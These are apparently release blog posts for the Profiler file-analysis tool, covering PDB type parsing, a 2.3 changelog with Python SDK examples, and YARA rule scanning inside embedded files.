The main feature of the upcoming 2.4 version of Profiler is the initial support for the PDB format. Our code doesn’t rely on the Microsoft DIA SDK and thus works also on OS X and Linux.

Since the PDB format is undocumented, this task would’ve been extremely difficult without the fantastic work on PDBs of the never too much revered Sven B. Schreiber.

Let’s open a PDB file.

As you can see the streams in the PDB can be explored. The TPI stream (the one describing types) offers further inspection.

All the types contained in the PDB can be exported to a Profiler header by pressing Ctrl+R and executing the ‘Dump types to header’ action.

Now the types can be used from both the hex editor and the Python SDK.

We can explore the dumped header by using, as usual, the Header Manager tool.

The type shown above in the hex editor is simple. So let’s look at what a more complex PDB type may look like.

<r id="CWnd" type="class" size="84">
    <b>
        <b type="CCmdTarget" offset="0" access="public"/>
    </b>
    <m id="_GetBaseClass" type="CRuntimeClass * ()"/>
    <s id="classCWnd" type="CRuntimeClass const"/>
    <m id="GetThisClass" type="CRuntimeClass * ()"/>
    <m id="GetRuntimeClass" type="CRuntimeClass * ()"/>
    <m id="CreateObject" type="CObject * ()"/>
    <m id="GetCurrentMessage" type="tagMSG const * ()"/>
    <f id="m_hWnd" type="HWND__ *" offset="32"/>
    <m id="operator struct HWND__ *" type="HWND__ * ()"/>
    <m id="operator==" type="int32 (CWnd const *)"/>
    <m id="operator!=" type="int32 (CWnd const *)"/>
    <m id="GetSafeHwnd" type="HWND__ * ()"/>
    <m id="GetStyle" type="unsigned int ()"/>
    <m id="GetExStyle" type="unsigned int ()"/>
    <m id="ModifyStyle" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)"/>
    <m id="ModifyStyle" type="int32 (unsigned int, unsigned int, uint32)"/>
    <m id="ModifyStyleEx" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)"/>
    <m id="ModifyStyleEx" type="int32 (unsigned int, unsigned int, uint32)"/>
    <m id="GetOwner" type="CWnd * ()"/>
    <m id="SetOwner" type="void (CWnd *)"/>
    <m id="GetWindowInfo" type="int32 (tagWINDOWINFO *)"/>
    <m id="GetTitleBarInfo" type="int32 (tagTITLEBARINFO *)"/>
    <m id="CWnd" type="void (CWnd const *)"/>
    <m id="CWnd" type="void (HWND__ *)"/>
    <m id="CWnd" type="void ()"/>
    <m id="FromHandle" type="CWnd * (HWND__ *)"/>
    <m id="FromHandlePermanent" type="CWnd * (HWND__ *)"/>
    <m id="DeleteTempMap" type="void ()"/>
    <!-- etc. -->
</r>

The PDB code is also exposed to the SDK. This is a small snippet of code, which dumps all the types to a text buffer and then displays them in a text view.

from Pro.Core import *
from Pro.UI import *
from Pro.PDB import *

def showPDBTypes():
    ctx = proContext()
    out = proTextStream()
    out.setIndentSize(4)

    obj = ctx.currentScanProvider().getObject()
    tpi = obj.GetStreamObject(PDB_STREAM_ID_TPI)
    tpihdr = obj.TPIHeader(tpi)
    tiMin = tpihdr.Num("tiMin")
    tiMax = tpihdr.Num("tiMax")
    tctx = obj.CreateTypeContext(tpi)
    for ti in range(tiMin, tiMax):
        tctx.DumpType(out, ti)

    view = ctx.createView(ProView.Type_Text, "PDB Test")
    view.setLanguage("XML")
    view.setText(out.buffer)
    ctx.addView(view)

showPDBTypes()

In order to dump all types to a single header, you can use the DumpAllToHeader method.

Profiler 2.3

Profiler 2.3 is out with the following news:

– introduced YARA 3.2 support
– added groups for logic providers
– added Python action to encode/decode text
– added Python action to strip XML down to text
– added the possibility to choose the fixed font
– added color randomization for structs and intervals
– added close report and quit APIs
– exposed more methods of the Report class (including save)
– improved indentation handling in the script editor
– synchronized main and workspace output views
– improved output view
– updated libmagic to 5.21
– updated Capstone to 3.0
– many small improvements
– fixed libmagic on Linux
– removed the tray icon
– minor bug fixes

Logic provider groups

Logic providers can now be grouped in order to avoid clutter in the main window. Adding the following line to an existing logic provider will result in a new group being created:

group = Extra

Encode/decode text action

A handy Python action to convert from hex to text and vice-versa using all of Python’s supported encodings. Place yourself in a hex or text view and run the encoding/decoding action ‘Bytes to text’ or ‘Text to bytes’.

The operation will open a new text or hex view, depending on whether it was an encoding or a decoding.
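
Under the hood this kind of conversion boils down to Python's own codecs. Here's a minimal standalone sketch of the two directions, operating on a hex string instead of a view; the function names are made up for the example and this is not the code of the action itself.

```python
import binascii

def bytes_to_text(hex_string, encoding="utf-8"):
    """Decode a string of hex digits into text using the given encoding."""
    raw = bytes.fromhex(hex_string)  # spaces between bytes are ignored
    return raw.decode(encoding)

def text_to_bytes(text, encoding="utf-8"):
    """Encode text and return the resulting bytes as hex digits."""
    raw = text.encode(encoding)
    return binascii.hexlify(raw).decode("ascii")

print(text_to_bytes("Hi", "utf-16-le"))
print(bytes_to_text("48 00 69 00", "utf-16-le"))
```

Any encoding name accepted by Python’s codecs module can be passed as the second argument.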

XML to text action

Strips the tags from an XML document and displays only the text. The action can be performed on both a hex and a text view.

The result is opened in a new text view. This is useful to view the text of a DOCX or ODT document. In the future the preview for these documents will be made available automatically, but in the meantime this action is helpful.
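
The same idea can be sketched with the standard library alone. The function below is only an approximation written for this post, using ElementTree, and not the code of the action. Since DOCX and ODT files are Zip containers, the XML has to be taken from the document part inside the archive first.

```python
import xml.etree.ElementTree as ET

def xml_to_text(xml_data):
    """Return the text content of an XML document, one text fragment per line."""
    root = ET.fromstring(xml_data)
    pieces = (t.strip() for t in root.itertext())
    return "\n".join(p for p in pieces if p)

sample = "<doc><p>Hello <b>world</b></p><p>Second paragraph</p></doc>"
print(xml_to_text(sample))
```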

Fixed font preferences

The fixed font used in most views can now be chosen from the ‘General’ settings.

Struct/intervals color randomization

When adding a structure or interval to the hex view, the chosen color is now randomized every time the dialog shows up. This behaviour can be disabled from the dialog itself, and it’s also possible to randomize the color again by clicking on the specific refresh button.

Manually picking a different color for every interval is time consuming and so this feature should speed up raw data analysis.

Report APIs

Most of the report APIs have been exposed (check out the SDK documentation). This combined with the newly introduced ‘quit’ SDK method can be used to perform custom scans programmatically and save the resulting report.

Here’s a small example which can be launched from the command line:

from Pro.Core import *
import sys
 
ctx = proCoreContext()
 
def init():
    ctx.getSystem().addFile(sys.argv[1])
    return True
 
def rload():
    ctx.unregisterLogicProvider("test_logic")
    ctx.getReport().saveAs("auto.cpro")
    ctx.quit()
 
ctx.registerLogicProvider("test_logic", init, None, None, None, rload)
ctx.startScan("test_logic")

The command line syntax to run this script would be:

cerpro -r scan.py [file to scan]

The UI will show up and close automatically once the ‘quit’ method is called. Running this script in console mode using the ‘-c’ parameter is not yet possible, because of the differences in message handling on different platforms, but it will be in the future.

Synchronized output views

The output views of the main window and of the workspace are now synchronized, so important log messages are no longer missed because they were printed in the other context.

Enjoy!

YARA 3.2.0 support

The upcoming 2.3 version of Profiler includes support for the latest YARA engine. This new release is scheduled for the first week of January and it will include YARA on all supported platforms.

One inherent technical advantage of having YARA support in Profiler is that it will be possible to scan for YARA rules inside embedded files/objects, like files in a Zip archive, in a CHM file, in an OLEStream, streams in a PDF, etc.
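
To illustrate why this matters, here is a standalone sketch which walks nested Zip archives and checks every embedded file. To keep it self-contained, a plain byte search stands in for the YARA engine, and the traversal is of course far simpler than what Profiler does with its many supported formats. All names are invented for the example.

```python
import io
import zipfile

def scan_embedded(data, pattern, path=None, max_depth=4):
    """Yield the paths of the (possibly nested) files which contain pattern."""
    is_zip = max_depth > 0 and zipfile.is_zipfile(io.BytesIO(data))
    if not is_zip:
        # leaf object: this is where a real scanner would run its rules
        if pattern in data:
            yield path or "<root>"
        return
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith("/"):
                continue  # skip directory entries
            child = name if path is None else path + "/" + name
            for hit in scan_embedded(zf.read(name), pattern, child, max_depth - 1):
                yield hit

def make_zip(members):
    """Build an in-memory Zip archive from a {name: bytes} dictionary."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()

inner = make_zip({"b.txt": b"xx EVIL xx"})
outer = make_zip({"a.txt": b"nothing here", "inner.zip": inner})
print(list(scan_embedded(outer, b"EVIL")))
```

A scanner which only looks at the outer file could easily miss the match, for instance when the archive is compressed.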

The YARA engine itself has been compiled with all standard modules (except for cuckoo). Even the magic module is available, since libmagic is also supported by Profiler.

The initial YARA integration comes as a hook extension, an action and Python SDK support. The YARA Python module is the official one; the only difference is the import statement. You can run existing YARA Python code without modification by using the following import syntax:

import Pro.yara as yara
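
If the same script should also run outside of Profiler, the import can be made tolerant. The following sketch falls back to a stock yara-python installation when Pro.yara isn’t available and gives up gracefully when neither is present; the rule and the scan function are just examples.

```python
try:
    import Pro.yara as yara      # inside Profiler
except ImportError:
    try:
        import yara              # stock yara-python, if installed
    except ImportError:
        yara = None              # no YARA available at all

RULE = 'rule test { strings: $sig = "test" condition: $sig at 0 }'

def scan(data):
    """Return the names of the matching rules, or None if YARA is unavailable."""
    if yara is None:
        return None
    rules = yara.compile(source=RULE)
    return [m.rule for m in rules.match(data=data)]

print(scan(b"test data"))
```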

So let’s start a YARA scan. To do that, we need to enable the YARA hook extension. On Windows remember to configure Python in case you haven’t yet, since all extensions have been written in it.

When a scan is started, a YARA settings dialog will show up.

This dialog lets us choose various settings including the type of rules to load.

There are four possibilities: a simple text field containing YARA rules, a plain text rules file, a compiled rules file or a custom expression which must evaluate to a valid Rules object.

The report settings specify how we will be alerted of matches. The ‘only matches’ option makes sure that only files (or their sub-files) with a match will be included in the final report. The ‘add to meta-data’ option causes the matches to be visible as meta-data strings of a file. The ‘as threats’ option reports every match as a 100% risk threat. The ‘print to output’ option prints the matches to the output view.

Since we had the ‘only matches’ option enabled, we will find only matching files in our final report.

And since we had also the ‘to meta-data’ option enabled, we will see the matches when opening a file in the workspace.

The YARA scan functionality comes also as an action when we find ourselves in a hex view. You can either scan the whole hex data or select a range. Then press Ctrl+R to run an action and select ‘YARA scan’.

In this case we won’t be given report options, since the only thing which can be performed is to print out matches in the output view.

Like this:

Of course, all supported platforms come also with the official YARA command line utility.

Since this has been a customer request for quite some time, I think it will be appreciated by some of our users.